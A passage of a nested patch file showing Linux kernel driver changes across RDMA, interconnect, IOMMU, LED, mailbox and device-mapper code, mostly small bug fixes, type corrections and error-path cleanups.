++int rxe_init_task(struct rxe_task *task, struct rxe_qp *qp,
++		  int (*func)(struct rxe_qp *))
+ {
+-	task->arg	= arg;
++	task->qp	= qp;
+ 	task->func	= func;
+ 	task->destroyed	= false;
+ 
+diff --git a/drivers/infiniband/sw/rxe/rxe_task.h b/drivers/infiniband/sw/rxe/rxe_task.h
+index 7b88129702ac6..99585e40cef92 100644
+--- a/drivers/infiniband/sw/rxe/rxe_task.h
++++ b/drivers/infiniband/sw/rxe/rxe_task.h
+@@ -22,28 +22,23 @@ struct rxe_task {
+ 	struct tasklet_struct	tasklet;
+ 	int			state;
+ 	spinlock_t		lock;
+-	void			*arg;
+-	int			(*func)(void *arg);
++	struct rxe_qp		*qp;
++	int			(*func)(struct rxe_qp *qp);
+ 	int			ret;
+ 	bool			destroyed;
+ };
+ 
+ /*
+  * init rxe_task structure
+- *	arg  => parameter to pass to fcn
++ *	qp  => parameter to pass to func
+  *	func => function to call until it returns != 0
+  */
+-int rxe_init_task(struct rxe_task *task, void *arg, int (*func)(void *));
++int rxe_init_task(struct rxe_task *task, struct rxe_qp *qp,
++		  int (*func)(struct rxe_qp *));
+ 
+ /* cleanup task */
+ void rxe_cleanup_task(struct rxe_task *task);
+ 
+-/*
+- * raw call to func in loop without any checking
+- * can call when tasklets are disabled
+- */
+-int __rxe_do_task(struct rxe_task *task);
+-
+ void rxe_run_task(struct rxe_task *task);
+ 
+ void rxe_sched_task(struct rxe_task *task);
+diff --git a/drivers/infiniband/sw/rxe/rxe_verbs.c b/drivers/infiniband/sw/rxe/rxe_verbs.c
+index a3aee247aa157..9ae7cf93365c7 100644
+--- a/drivers/infiniband/sw/rxe/rxe_verbs.c
++++ b/drivers/infiniband/sw/rxe/rxe_verbs.c
+@@ -786,8 +786,6 @@ static int rxe_destroy_cq(struct ib_cq *ibcq, struct ib_udata *udata)
+ 	if (atomic_read(&cq->num_wq))
+ 		return -EINVAL;
+ 
+-	rxe_cq_disable(cq);
+-
+ 	rxe_cleanup(cq);
+ 	return 0;
+ }
+diff --git a/drivers/infiniband/sw/rxe/rxe_verbs.h b/drivers/infiniband/sw/rxe/rxe_verbs.h
+index c269ae2a32243..d812093a39166 100644
+--- a/drivers/infiniband/sw/rxe/rxe_verbs.h
++++ b/drivers/infiniband/sw/rxe/rxe_verbs.h
+@@ -63,9 +63,7 @@ struct rxe_cq {
+ 	struct rxe_queue	*queue;
+ 	spinlock_t		cq_lock;
+ 	u8			notify;
+-	bool			is_dying;
+ 	bool			is_user;
+-	struct tasklet_struct	comp_task;
+ 	atomic_t		num_wq;
+ };
+ 
+diff --git a/drivers/infiniband/sw/siw/siw_main.c b/drivers/infiniband/sw/siw/siw_main.c
+index dacc174604bf2..65b5cda5457ba 100644
+--- a/drivers/infiniband/sw/siw/siw_main.c
++++ b/drivers/infiniband/sw/siw/siw_main.c
+@@ -437,9 +437,6 @@ static int siw_netdev_event(struct notifier_block *nb, unsigned long event,
+ 
+ 	dev_dbg(&netdev->dev, "siw: event %lu\n", event);
+ 
+-	if (dev_net(netdev) != &init_net)
+-		return NOTIFY_OK;
+-
+ 	base_dev = ib_device_get_by_netdev(netdev, RDMA_DRIVER_SIW);
+ 	if (!base_dev)
+ 		return NOTIFY_OK;
+diff --git a/drivers/infiniband/sw/siw/siw_qp_tx.c b/drivers/infiniband/sw/siw/siw_qp_tx.c
+index 05052b49107f2..6bb9e9e81ff4c 100644
+--- a/drivers/infiniband/sw/siw/siw_qp_tx.c
++++ b/drivers/infiniband/sw/siw/siw_qp_tx.c
+@@ -558,7 +558,7 @@ static int siw_tx_hdt(struct siw_iwarp_tx *c_tx, struct socket *s)
+ 			data_len -= plen;
+ 			fp_off = 0;
+ 
+-			if (++seg > (int)MAX_ARRAY) {
++			if (++seg >= (int)MAX_ARRAY) {
+ 				siw_dbg_qp(tx_qp(c_tx), "to many fragments\n");
+ 				siw_unmap_pages(iov, kmap_mask, seg-1);
+ 				wqe->processed -= c_tx->bytes_unsent;
+diff --git a/drivers/infiniband/ulp/isert/ib_isert.c b/drivers/infiniband/ulp/isert/ib_isert.c
+index 75404885cf981..f290cd49698ea 100644
+--- a/drivers/infiniband/ulp/isert/ib_isert.c
++++ b/drivers/infiniband/ulp/isert/ib_isert.c
+@@ -2506,8 +2506,8 @@ isert_wait4cmds(struct iscsit_conn *conn)
+ 	isert_info("iscsit_conn %p\n", conn);
+ 
+ 	if (conn->sess) {
+-		target_stop_session(conn->sess->se_sess);
+-		target_wait_for_sess_cmds(conn->sess->se_sess);
++		target_stop_cmd_counter(conn->cmd_cnt);
++		target_wait_for_cmds(conn->cmd_cnt);
+ 	}
+ }
+ 
+diff --git a/drivers/infiniband/ulp/srpt/ib_srpt.c b/drivers/infiniband/ulp/srpt/ib_srpt.c
+index 3c3fae738c3ed..25e799dba999e 100644
+--- a/drivers/infiniband/ulp/srpt/ib_srpt.c
++++ b/drivers/infiniband/ulp/srpt/ib_srpt.c
+@@ -549,6 +549,7 @@ static int srpt_format_guid(char *buf, unsigned int size, const __be64 *guid)
+  */
+ static int srpt_refresh_port(struct srpt_port *sport)
+ {
++	struct ib_mad_agent *mad_agent;
+ 	struct ib_mad_reg_req reg_req;
+ 	struct ib_port_modify port_modify;
+ 	struct ib_port_attr port_attr;
+@@ -593,24 +594,26 @@ static int srpt_refresh_port(struct srpt_port *sport)
+ 		set_bit(IB_MGMT_METHOD_GET, reg_req.method_mask);
+ 		set_bit(IB_MGMT_METHOD_SET, reg_req.method_mask);
+ 
+-		sport->mad_agent = ib_register_mad_agent(sport->sdev->device,
+-							 sport->port,
+-							 IB_QPT_GSI,
+-							 &reg_req, 0,
+-							 srpt_mad_send_handler,
+-							 srpt_mad_recv_handler,
+-							 sport, 0);
+-		if (IS_ERR(sport->mad_agent)) {
++		mad_agent = ib_register_mad_agent(sport->sdev->device,
++						  sport->port,
++						  IB_QPT_GSI,
++						  &reg_req, 0,
++						  srpt_mad_send_handler,
++						  srpt_mad_recv_handler,
++						  sport, 0);
++		if (IS_ERR(mad_agent)) {
+ 			pr_err("%s-%d: MAD agent registration failed (%ld). Note: this is expected if SR-IOV is enabled.\n",
+ 			       dev_name(&sport->sdev->device->dev), sport->port,
+-			       PTR_ERR(sport->mad_agent));
++			       PTR_ERR(mad_agent));
+ 			sport->mad_agent = NULL;
+ 			memset(&port_modify, 0, sizeof(port_modify));
+ 			port_modify.clr_port_cap_mask = IB_PORT_DEVICE_MGMT_SUP;
+ 			ib_modify_port(sport->sdev->device, sport->port, 0,
+ 				       &port_modify);
+-
++			return 0;
+ 		}
++
++		sport->mad_agent = mad_agent;
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/input/touchscreen/raspberrypi-ts.c b/drivers/input/touchscreen/raspberrypi-ts.c
+index 5000f5fd9ec38..45c575df994e0 100644
+--- a/drivers/input/touchscreen/raspberrypi-ts.c
++++ b/drivers/input/touchscreen/raspberrypi-ts.c
+@@ -134,7 +134,7 @@ static int rpi_ts_probe(struct platform_device *pdev)
+ 		return -ENOENT;
+ 	}
+ 
+-	fw = rpi_firmware_get(fw_node);
++	fw = devm_rpi_firmware_get(&pdev->dev, fw_node);
+ 	of_node_put(fw_node);
+ 	if (!fw)
+ 		return -EPROBE_DEFER;
+@@ -160,7 +160,6 @@ static int rpi_ts_probe(struct platform_device *pdev)
+ 	touchbuf = (u32)ts->fw_regs_phys;
+ 	error = rpi_firmware_property(fw, RPI_FIRMWARE_FRAMEBUFFER_SET_TOUCHBUF,
+ 				      &touchbuf, sizeof(touchbuf));
+-	rpi_firmware_put(fw);
+ 	if (error || touchbuf != 0) {
+ 		dev_warn(dev, "Failed to set touchbuf, %d\n", error);
+ 		return error;
+diff --git a/drivers/interconnect/qcom/icc-rpm.c b/drivers/interconnect/qcom/icc-rpm.c
+index 4180a06681b2b..c80819557923e 100644
+--- a/drivers/interconnect/qcom/icc-rpm.c
++++ b/drivers/interconnect/qcom/icc-rpm.c
+@@ -11,7 +11,6 @@
+ #include <linux/of_device.h>
+ #include <linux/of_platform.h>
+ #include <linux/platform_device.h>
+-#include <linux/pm_domain.h>
+ #include <linux/regmap.h>
+ #include <linux/slab.h>
+ 
+@@ -496,12 +495,6 @@ regmap_done:
+ 	if (ret)
+ 		return ret;
+ 
+-	if (desc->has_bus_pd) {
+-		ret = dev_pm_domain_attach(dev, true);
+-		if (ret)
+-			return ret;
+-	}
+-
+ 	provider = &qp->provider;
+ 	provider->dev = dev;
+ 	provider->set = qcom_icc_set;
+diff --git a/drivers/interconnect/qcom/icc-rpm.h b/drivers/interconnect/qcom/icc-rpm.h
+index a49af844ab13e..02257b0d3d5c6 100644
+--- a/drivers/interconnect/qcom/icc-rpm.h
++++ b/drivers/interconnect/qcom/icc-rpm.h
+@@ -91,7 +91,6 @@ struct qcom_icc_desc {
+ 	size_t num_nodes;
+ 	const char * const *clocks;
+ 	size_t num_clocks;
+-	bool has_bus_pd;
+ 	enum qcom_icc_type type;
+ 	const struct regmap_config *regmap_cfg;
+ 	unsigned int qos_offset;
+diff --git a/drivers/interconnect/qcom/msm8996.c b/drivers/interconnect/qcom/msm8996.c
+index 25a1a32bc611f..14efd2761b7ab 100644
+--- a/drivers/interconnect/qcom/msm8996.c
++++ b/drivers/interconnect/qcom/msm8996.c
+@@ -1823,7 +1823,6 @@ static const struct qcom_icc_desc msm8996_a0noc = {
+ 	.num_nodes = ARRAY_SIZE(a0noc_nodes),
+ 	.clocks = bus_a0noc_clocks,
+ 	.num_clocks = ARRAY_SIZE(bus_a0noc_clocks),
+-	.has_bus_pd = true,
+ 	.regmap_cfg = &msm8996_a0noc_regmap_config
+ };
+ 
+diff --git a/drivers/interconnect/qcom/osm-l3.c b/drivers/interconnect/qcom/osm-l3.c
+index 1bafb54f14329..a1f4f918b9116 100644
+--- a/drivers/interconnect/qcom/osm-l3.c
++++ b/drivers/interconnect/qcom/osm-l3.c
+@@ -14,13 +14,6 @@
+ 
+ #include <dt-bindings/interconnect/qcom,osm-l3.h>
+ 
+-#include "sc7180.h"
+-#include "sc7280.h"
+-#include "sc8180x.h"
+-#include "sdm845.h"
+-#include "sm8150.h"
+-#include "sm8250.h"
+-
+ #define LUT_MAX_ENTRIES			40U
+ #define LUT_SRC				GENMASK(31, 30)
+ #define LUT_L_VAL			GENMASK(7, 0)
+diff --git a/drivers/interconnect/qcom/sc7180.h b/drivers/interconnect/qcom/sc7180.h
+index c6212a10c2f61..c2d8388bb8809 100644
+--- a/drivers/interconnect/qcom/sc7180.h
++++ b/drivers/interconnect/qcom/sc7180.h
+@@ -145,7 +145,5 @@
+ #define SC7180_SLAVE_SERVICE_SNOC			134
+ #define SC7180_SLAVE_QDSS_STM				135
+ #define SC7180_SLAVE_TCU				136
+-#define SC7180_MASTER_OSM_L3_APPS			137
+-#define SC7180_SLAVE_OSM_L3				138
+ 
+ #endif
+diff --git a/drivers/interconnect/qcom/sc7280.h b/drivers/interconnect/qcom/sc7280.h
+index 1fb9839b2c14b..175e400305c51 100644
+--- a/drivers/interconnect/qcom/sc7280.h
++++ b/drivers/interconnect/qcom/sc7280.h
+@@ -150,7 +150,5 @@
+ #define SC7280_SLAVE_PCIE_1			139
+ #define SC7280_SLAVE_QDSS_STM			140
+ #define SC7280_SLAVE_TCU			141
+-#define SC7280_MASTER_EPSS_L3_APPS		142
+-#define SC7280_SLAVE_EPSS_L3			143
+ 
+ #endif
+diff --git a/drivers/interconnect/qcom/sc8180x.h b/drivers/interconnect/qcom/sc8180x.h
+index 2eafd35543c78..ce32295af8f3a 100644
+--- a/drivers/interconnect/qcom/sc8180x.h
++++ b/drivers/interconnect/qcom/sc8180x.h
+@@ -168,8 +168,6 @@
+ #define SC8180X_SLAVE_EBI_CH0_DISPLAY		158
+ #define SC8180X_SLAVE_MNOC_SF_MEM_NOC_DISPLAY	159
+ #define SC8180X_SLAVE_MNOC_HF_MEM_NOC_DISPLAY	160
+-#define SC8180X_MASTER_OSM_L3_APPS		161
+-#define SC8180X_SLAVE_OSM_L3			162
+ 
+ #define SC8180X_MASTER_QUP_CORE_0		163
+ #define SC8180X_MASTER_QUP_CORE_1		164
+diff --git a/drivers/interconnect/qcom/sdm845.h b/drivers/interconnect/qcom/sdm845.h
+index 776e9c2acb278..bc7e425ce9852 100644
+--- a/drivers/interconnect/qcom/sdm845.h
++++ b/drivers/interconnect/qcom/sdm845.h
+@@ -136,7 +136,5 @@
+ #define SDM845_SLAVE_SERVICE_SNOC			128
+ #define SDM845_SLAVE_QDSS_STM				129
+ #define SDM845_SLAVE_TCU				130
+-#define SDM845_MASTER_OSM_L3_APPS			131
+-#define SDM845_SLAVE_OSM_L3				132
+ 
+ #endif /* __DRIVERS_INTERCONNECT_QCOM_SDM845_H__ */
+diff --git a/drivers/interconnect/qcom/sm8150.h b/drivers/interconnect/qcom/sm8150.h
+index 97996f64d799c..3e01ac76ae1db 100644
+--- a/drivers/interconnect/qcom/sm8150.h
++++ b/drivers/interconnect/qcom/sm8150.h
+@@ -148,7 +148,5 @@
+ #define SM8150_SLAVE_VSENSE_CTRL_CFG		137
+ #define SM8150_SNOC_CNOC_MAS			138
+ #define SM8150_SNOC_CNOC_SLV			139
+-#define SM8150_MASTER_OSM_L3_APPS		140
+-#define SM8150_SLAVE_OSM_L3			141
+ 
+ #endif
+diff --git a/drivers/interconnect/qcom/sm8250.h b/drivers/interconnect/qcom/sm8250.h
+index b31fb431a20fc..7eb6c709c30d1 100644
+--- a/drivers/interconnect/qcom/sm8250.h
++++ b/drivers/interconnect/qcom/sm8250.h
+@@ -158,7 +158,5 @@
+ #define SM8250_SLAVE_VSENSE_CTRL_CFG		147
+ #define SM8250_SNOC_CNOC_MAS			148
+ #define SM8250_SNOC_CNOC_SLV			149
+-#define SM8250_MASTER_EPSS_L3_APPS		150
+-#define SM8250_SLAVE_EPSS_L3			151
+ 
+ #endif
+diff --git a/drivers/iommu/amd/amd_iommu_types.h b/drivers/iommu/amd/amd_iommu_types.h
+index 3d684190b4d53..f7cb1ce0f9bbc 100644
+--- a/drivers/iommu/amd/amd_iommu_types.h
++++ b/drivers/iommu/amd/amd_iommu_types.h
+@@ -1001,8 +1001,8 @@ struct amd_ir_data {
+ 	 */
+ 	struct irq_cfg *cfg;
+ 	int ga_vector;
+-	int ga_root_ptr;
+-	int ga_tag;
++	u64 ga_root_ptr;
++	u32 ga_tag;
+ };
+ 
+ struct amd_irte_ops {
+diff --git a/drivers/iommu/amd/iommu.c b/drivers/iommu/amd/iommu.c
+index ff4f3d4da3402..e108280fdaa0e 100644
+--- a/drivers/iommu/amd/iommu.c
++++ b/drivers/iommu/amd/iommu.c
+@@ -1656,10 +1656,6 @@ static void do_attach(struct iommu_dev_data *dev_data,
+ 	domain->dev_iommu[iommu->index] += 1;
+ 	domain->dev_cnt                 += 1;
+ 
+-	/* Override supported page sizes */
+-	if (domain->flags & PD_GIOV_MASK)
+-		domain->domain.pgsize_bitmap = AMD_IOMMU_PGSIZES_V2;
+-
+ 	/* Update device table */
+ 	set_dte_entry(iommu, dev_data->devid, domain,
+ 		      ats, dev_data->iommu_v2);
+@@ -2038,6 +2034,8 @@ static int protection_domain_init_v2(struct protection_domain *domain)
+ 
+ 	domain->flags |= PD_GIOV_MASK;
+ 
++	domain->domain.pgsize_bitmap = AMD_IOMMU_PGSIZES_V2;
++
+ 	if (domain_enable_v2(domain, 1)) {
+ 		domain_id_free(domain->id);
+ 		return -ENOMEM;
+diff --git a/drivers/iommu/iommu.c b/drivers/iommu/iommu.c
+index f8100067502fb..e6f2a0bc9f0be 100644
+--- a/drivers/iommu/iommu.c
++++ b/drivers/iommu/iommu.c
+@@ -1940,8 +1940,13 @@ static struct iommu_domain *__iommu_domain_alloc(struct bus_type *bus,
+ 		return NULL;
+ 
+ 	domain->type = type;
+-	/* Assume all sizes by default; the driver may override this later */
+-	domain->pgsize_bitmap = bus->iommu_ops->pgsize_bitmap;
++	/*
++	 * If not already set, assume all sizes by default; the driver
++	 * may override this later
++	 */
++	if (!domain->pgsize_bitmap)
++		domain->pgsize_bitmap = bus->iommu_ops->pgsize_bitmap;
++
+ 	if (!domain->ops)
+ 		domain->ops = bus->iommu_ops->default_domain_ops;
+ 
+diff --git a/drivers/iommu/iommufd/selftest.c b/drivers/iommu/iommufd/selftest.c
+index cfb5fe9a5e0ee..76c46847dc494 100644
+--- a/drivers/iommu/iommufd/selftest.c
++++ b/drivers/iommu/iommufd/selftest.c
+@@ -339,10 +339,12 @@ static int iommufd_test_md_check_pa(struct iommufd_ucmd *ucmd,
+ {
+ 	struct iommufd_hw_pagetable *hwpt;
+ 	struct mock_iommu_domain *mock;
++	uintptr_t end;
+ 	int rc;
+ 
+ 	if (iova % MOCK_IO_PAGE_SIZE || length % MOCK_IO_PAGE_SIZE ||
+-	    (uintptr_t)uptr % MOCK_IO_PAGE_SIZE)
++	    (uintptr_t)uptr % MOCK_IO_PAGE_SIZE ||
++	    check_add_overflow((uintptr_t)uptr, (uintptr_t)length, &end))
+ 		return -EINVAL;
+ 
+ 	hwpt = get_md_pagetable(ucmd, mockpt_id, &mock);
+@@ -390,7 +392,10 @@ static int iommufd_test_md_check_refs(struct iommufd_ucmd *ucmd,
+ 				      void __user *uptr, size_t length,
+ 				      unsigned int refs)
+ {
+-	if (length % PAGE_SIZE || (uintptr_t)uptr % PAGE_SIZE)
++	uintptr_t end;
++
++	if (length % PAGE_SIZE || (uintptr_t)uptr % PAGE_SIZE ||
++	    check_add_overflow((uintptr_t)uptr, (uintptr_t)length, &end))
+ 		return -EINVAL;
+ 
+ 	for (; length; length -= PAGE_SIZE) {
+diff --git a/drivers/iommu/mtk_iommu.c b/drivers/iommu/mtk_iommu.c
+index 2badd6acfb23d..4ef71afb9525a 100644
+--- a/drivers/iommu/mtk_iommu.c
++++ b/drivers/iommu/mtk_iommu.c
+@@ -1267,6 +1267,14 @@ static int mtk_iommu_probe(struct platform_device *pdev)
+ 			return PTR_ERR(data->bclk);
+ 	}
+ 
++	if (MTK_IOMMU_HAS_FLAG(data->plat_data, PGTABLE_PA_35_EN)) {
++		ret = dma_set_mask(dev, DMA_BIT_MASK(35));
++		if (ret) {
++			dev_err(dev, "Failed to set dma_mask 35.\n");
++			return ret;
++		}
++	}
++
+ 	pm_runtime_enable(dev);
+ 
+ 	if (MTK_IOMMU_IS_TYPE(data->plat_data, MTK_IOMMU_TYPE_MM)) {
+diff --git a/drivers/leds/Kconfig b/drivers/leds/Kconfig
+index 499d0f215a8bf..2378cfb7443e4 100644
+--- a/drivers/leds/Kconfig
++++ b/drivers/leds/Kconfig
+@@ -814,7 +814,7 @@ config LEDS_SPI_BYTE
+ config LEDS_TI_LMU_COMMON
+ 	tristate "LED driver for TI LMU"
+ 	depends on LEDS_CLASS
+-	depends on REGMAP
++	select REGMAP
+ 	help
+ 	  Say Y to enable the LED driver for TI LMU devices.
+ 	  This supports common features between the TI LM3532, LM3631, LM3632,
+diff --git a/drivers/leds/leds-tca6507.c b/drivers/leds/leds-tca6507.c
+index 161bef65c6b7b..62a968613cc37 100644
+--- a/drivers/leds/leds-tca6507.c
++++ b/drivers/leds/leds-tca6507.c
+@@ -691,8 +691,9 @@ tca6507_led_dt_init(struct device *dev)
+ 		if (fwnode_property_read_string(child, "label", &led.name))
+ 			led.name = fwnode_get_name(child);
+ 
+-		fwnode_property_read_string(child, "linux,default-trigger",
+-					    &led.default_trigger);
++		if (fwnode_property_read_string(child, "linux,default-trigger",
++						&led.default_trigger))
++			led.default_trigger = NULL;
+ 
+ 		led.flags = 0;
+ 		if (fwnode_property_match_string(child, "compatible",
+diff --git a/drivers/macintosh/Kconfig b/drivers/macintosh/Kconfig
+index 539a2ed4e13dc..a0e717a986dcb 100644
+--- a/drivers/macintosh/Kconfig
++++ b/drivers/macintosh/Kconfig
+@@ -86,6 +86,7 @@ config ADB_PMU_LED
+ 
+ config ADB_PMU_LED_DISK
+ 	bool "Use front LED as DISK LED by default"
++	depends on ATA
+ 	depends on ADB_PMU_LED
+ 	depends on LEDS_CLASS
+ 	select LEDS_TRIGGERS
+diff --git a/drivers/macintosh/windfarm_smu_sat.c b/drivers/macintosh/windfarm_smu_sat.c
+index ebc4256a9e4a0..089f2743a070d 100644
+--- a/drivers/macintosh/windfarm_smu_sat.c
++++ b/drivers/macintosh/windfarm_smu_sat.c
+@@ -171,6 +171,7 @@ static void wf_sat_release(struct kref *ref)
+ 
+ 	if (sat->nr >= 0)
+ 		sats[sat->nr] = NULL;
++	of_node_put(sat->node);
+ 	kfree(sat);
+ }
+ 
+diff --git a/drivers/mailbox/mailbox-mpfs.c b/drivers/mailbox/mailbox-mpfs.c
+index 853901acaeec2..08aa840cccaca 100644
+--- a/drivers/mailbox/mailbox-mpfs.c
++++ b/drivers/mailbox/mailbox-mpfs.c
+@@ -79,6 +79,13 @@ static bool mpfs_mbox_busy(struct mpfs_mbox *mbox)
+ 	return status & SCB_STATUS_BUSY_MASK;
+ }
+ 
++static bool mpfs_mbox_last_tx_done(struct mbox_chan *chan)
++{
++	struct mpfs_mbox *mbox = (struct mpfs_mbox *)chan->con_priv;
++
++	return !mpfs_mbox_busy(mbox);
++}
++
+ static int mpfs_mbox_send_data(struct mbox_chan *chan, void *data)
+ {
+ 	struct mpfs_mbox *mbox = (struct mpfs_mbox *)chan->con_priv;
+@@ -182,7 +189,6 @@ static irqreturn_t mpfs_mbox_inbox_isr(int irq, void *data)
+ 
+ 	mpfs_mbox_rx_data(chan);
+ 
+-	mbox_chan_txdone(chan, 0);
+ 	return IRQ_HANDLED;
+ }
+ 
+@@ -212,6 +218,7 @@ static const struct mbox_chan_ops mpfs_mbox_ops = {
+ 	.send_data = mpfs_mbox_send_data,
+ 	.startup = mpfs_mbox_startup,
+ 	.shutdown = mpfs_mbox_shutdown,
++	.last_tx_done = mpfs_mbox_last_tx_done,
+ };
+ 
+ static int mpfs_mbox_probe(struct platform_device *pdev)
+@@ -247,7 +254,8 @@ static int mpfs_mbox_probe(struct platform_device *pdev)
+ 	mbox->controller.num_chans = 1;
+ 	mbox->controller.chans = mbox->chans;
+ 	mbox->controller.ops = &mpfs_mbox_ops;
+-	mbox->controller.txdone_irq = true;
++	mbox->controller.txdone_poll = true;
++	mbox->controller.txpoll_period = 10u;
+ 
+ 	ret = devm_mbox_controller_register(&pdev->dev, &mbox->controller);
+ 	if (ret) {
+diff --git a/drivers/mailbox/zynqmp-ipi-mailbox.c b/drivers/mailbox/zynqmp-ipi-mailbox.c
+index 12e004ff1a147..e02a4a18e8c29 100644
+--- a/drivers/mailbox/zynqmp-ipi-mailbox.c
++++ b/drivers/mailbox/zynqmp-ipi-mailbox.c
+@@ -152,7 +152,7 @@ static irqreturn_t zynqmp_ipi_interrupt(int irq, void *data)
+ 	struct zynqmp_ipi_message *msg;
+ 	u64 arg0, arg3;
+ 	struct arm_smccc_res res;
+-	int ret, i;
++	int ret, i, status = IRQ_NONE;
+ 
+ 	(void)irq;
+ 	arg0 = SMC_IPI_MAILBOX_STATUS_ENQUIRY;
+@@ -170,11 +170,11 @@ static irqreturn_t zynqmp_ipi_interrupt(int irq, void *data)
+ 				memcpy_fromio(msg->data, mchan->req_buf,
+ 					      msg->len);
+ 				mbox_chan_received_data(chan, (void *)msg);
+-				return IRQ_HANDLED;
++				status = IRQ_HANDLED;
+ 			}
+ 		}
+ 	}
+-	return IRQ_NONE;
++	return status;
+ }
+ 
+ /**
+diff --git a/drivers/md/dm-clone-target.c b/drivers/md/dm-clone-target.c
+index 29e0b85eeaf09..e088081b7a8ad 100644
+--- a/drivers/md/dm-clone-target.c
++++ b/drivers/md/dm-clone-target.c
+@@ -2205,6 +2205,7 @@ static int __init dm_clone_init(void)
+ 	r = dm_register_target(&clone_target);
+ 	if (r < 0) {
+ 		DMERR("Failed to register clone target");
++		kmem_cache_destroy(_hydration_cache);
+ 		return r;
+ 	}
+ 
+diff --git a/drivers/md/dm-flakey.c b/drivers/md/dm-flakey.c
+index 7efbdb42cf3b4..3b34270ce607e 100644
+--- a/drivers/md/dm-flakey.c
++++ b/drivers/md/dm-flakey.c
+@@ -124,9 +124,9 @@ static int parse_features(struct dm_arg_set *as, struct flakey_c *fc,
+ 			 * Direction r or w?
+ 			 */
+ 			arg_name = dm_shift_arg(as);
+-			if (!strcasecmp(arg_name, "w"))
++			if (arg_name && !strcasecmp(arg_name, "w"))
+ 				fc->corrupt_bio_rw = WRITE;
+-			else if (!strcasecmp(arg_name, "r"))
++			else if (arg_name && !strcasecmp(arg_name, "r"))
+ 				fc->corrupt_bio_rw = READ;
+ 			else {
+ 				ti->error = "Invalid corrupt bio direction (r or w)";
+diff --git a/drivers/md/dm-integrity.c b/drivers/md/dm-integrity.c
+index 53f9f765df9fd..a2b8f8781a99f 100644
+--- a/drivers/md/dm-integrity.c
++++ b/drivers/md/dm-integrity.c
+@@ -4646,11 +4646,13 @@ static int __init dm_integrity_init(void)
+ 	}
+ 
+ 	r = dm_register_target(&integrity_target);
+-
+-	if (r < 0)
++	if (r < 0) {
+ 		DMERR("register failed %d", r);
++		kmem_cache_destroy(journal_io_cache);
++		return r;
++	}
+ 
+-	return r;
++	return 0;
+ }
+ 
+ static void __exit dm_integrity_exit(void)
+diff --git a/drivers/md/dm-ioctl.c b/drivers/md/dm-ioctl.c
+index 37f5ea7337cc2..bd63fc94f1dd9 100644
+--- a/drivers/md/dm-ioctl.c
++++ b/drivers/md/dm-ioctl.c
+@@ -1151,10 +1151,13 @@ static int do_resume(struct dm_ioctl *param)
+ 	/* Do we need to load a new map ? */
+ 	if (new_map) {
+ 		sector_t old_size, new_size;
++		int srcu_idx;
+ 
+ 		/* Suspend if it isn't already suspended */
+-		if (param->flags & DM_SKIP_LOCKFS_FLAG)
++		old_map = dm_get_live_table(md, &srcu_idx);
++		if ((param->flags & DM_SKIP_LOCKFS_FLAG) || !old_map)
+ 			suspend_flags &= ~DM_SUSPEND_LOCKFS_FLAG;
++		dm_put_live_table(md, srcu_idx);
+ 		if (param->flags & DM_NOFLUSH_FLAG)
+ 			suspend_flags |= DM_SUSPEND_NOFLUSH_FLAG;
+ 		if (!dm_suspended_md(md))
+@@ -1539,11 +1542,12 @@ static int table_clear(struct file *filp, struct dm_ioctl *param, size_t param_s
+ 		has_new_map = true;
+ 	}
+ 
+-	param->flags &= ~DM_INACTIVE_PRESENT_FLAG;
+-
+-	__dev_status(hc->md, param);
+ 	md = hc->md;
+ 	up_write(&_hash_lock);
++
++	param->flags &= ~DM_INACTIVE_PRESENT_FLAG;
++	__dev_status(md, param);
++
+ 	if (old_map) {
+ 		dm_sync_table(md);
+ 		dm_table_destroy(old_map);
+diff --git a/drivers/md/dm-table.c b/drivers/md/dm-table.c
+index c571f2385b57f..3acded2f976db 100644
+--- a/drivers/md/dm-table.c
++++ b/drivers/md/dm-table.c
+@@ -1203,21 +1203,12 @@ struct dm_crypto_profile {
+ 	struct mapped_device *md;
+ };
+ 
+-struct dm_keyslot_evict_args {
+-	const struct blk_crypto_key *key;
+-	int err;
+-};
+-
+ static int dm_keyslot_evict_callback(struct dm_target *ti, struct dm_dev *dev,
+ 				     sector_t start, sector_t len, void *data)
+ {
+-	struct dm_keyslot_evict_args *args = data;
+-	int err;
++	const struct blk_crypto_key *key = data;
+ 
+-	err = blk_crypto_evict_key(dev->bdev, args->key);
+-	if (!args->err)
+-		args->err = err;
+-	/* Always try to evict the key from all devices. */
++	blk_crypto_evict_key(dev->bdev, key);
+ 	return 0;
+ }
+ 
+@@ -1230,7 +1221,6 @@ static int dm_keyslot_evict(struct blk_crypto_profile *profile,
+ {
+ 	struct mapped_device *md =
+ 		container_of(profile, struct dm_crypto_profile, profile)->md;
+-	struct dm_keyslot_evict_args args = { key };
+ 	struct dm_table *t;
+ 	int srcu_idx;
+ 
+@@ -1243,11 +1233,12 @@ static int dm_keyslot_evict(struct blk_crypto_profile *profile,
+ 
+ 		if (!ti->type->iterate_devices)
+ 			continue;
+-		ti->type->iterate_devices(ti, dm_keyslot_evict_callback, &args);
++		ti->type->iterate_devices(ti, dm_keyslot_evict_callback,
++					  (void *)key);
+ 	}
+ 
+ 	dm_put_live_table(md, srcu_idx);
+-	return args.err;
++	return 0;
+ }
+ 
+ static int
+diff --git a/drivers/md/dm-verity-target.c b/drivers/md/dm-verity-target.c
+index 64e8ac429984d..14a9988ec30ba 100644
+--- a/drivers/md/dm-verity-target.c
++++ b/drivers/md/dm-verity-target.c
+@@ -523,7 +523,7 @@ static int verity_verify_io(struct dm_verity_io *io)
+ 		sector_t cur_block = io->block + b;
+ 		struct ahash_request *req = verity_io_hash_req(v, io);
+ 
+-		if (v->validated_blocks &&
++		if (v->validated_blocks && bio->bi_status == BLK_STS_OK &&
+ 		    likely(test_bit(cur_block, v->validated_blocks))) {
+ 			verity_bv_skip_block(v, io, iter);
+ 			continue;
+diff --git a/drivers/md/raid10.c b/drivers/md/raid10.c
+index 6c66357f92f55..ea6967aeaa02a 100644
+--- a/drivers/md/raid10.c
++++ b/drivers/md/raid10.c
+@@ -995,11 +995,15 @@ static bool stop_waiting_barrier(struct r10conf *conf)
+ 	    (!bio_list_empty(&bio_list[0]) || !bio_list_empty(&bio_list[1])))
+ 		return true;
+ 
+-	/* move on if recovery thread is blocked by us */
+-	if (conf->mddev->thread->tsk == current &&
+-	    test_bit(MD_RECOVERY_RUNNING, &conf->mddev->recovery) &&
+-	    conf->nr_queued > 0)
++	/*
++	 * move on if io is issued from raid10d(), nr_pending is not released
++	 * from original io(see handle_read_error()). All raise barrier is
++	 * blocked until this io is done.
++	 */
++	if (conf->mddev->thread->tsk == current) {
++		WARN_ON_ONCE(atomic_read(&conf->nr_pending) == 0);
+ 		return true;
++	}
+ 
